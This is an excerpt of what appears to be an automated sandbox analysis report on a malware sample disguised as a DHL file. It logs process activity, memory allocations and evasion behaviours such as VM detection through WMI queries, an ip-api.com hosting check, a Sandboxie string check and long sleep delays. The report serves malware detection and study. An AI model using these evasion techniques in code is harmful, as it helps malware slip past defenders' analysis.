                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: DHL_231437894819.bat.exe PID: 7972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: uvbIwIYe.exe PID: 7856, type: MEMORYSTR
                      Check if machine is in data center or colocation facility
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: DHL_231437894819.bat.exe, 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1534737744.0000000002C05000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, uvbIwIYe.exe, 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.3853312298.0000000002E34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: 1210000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: 2BC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: 4BC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: 7A00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: 8A00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: 8BB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: 9BB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: A590000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: B590000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeMemory allocated: C590000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeMemory allocated: 1690000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeMemory allocated: 30C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeMemory allocated: 7910000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeMemory allocated: 8910000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeMemory allocated: 8AA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeMemory allocated: 9AA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeMemory allocated: A4D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeMemory allocated: B4D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599889Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599763Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599655Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599539Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599421Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599312Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599189Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599062Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598953Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598843Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598734Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598624Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598507Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598389Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598277Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598157Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599449
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599124
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598905
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598685
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598547
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598436
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598328
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598218
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5473Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5376Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3361Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 5405Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1764
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8059
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe TID: 8000Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep count: 5473 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6148Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5780Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5620Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6872Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe TID: 2636Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
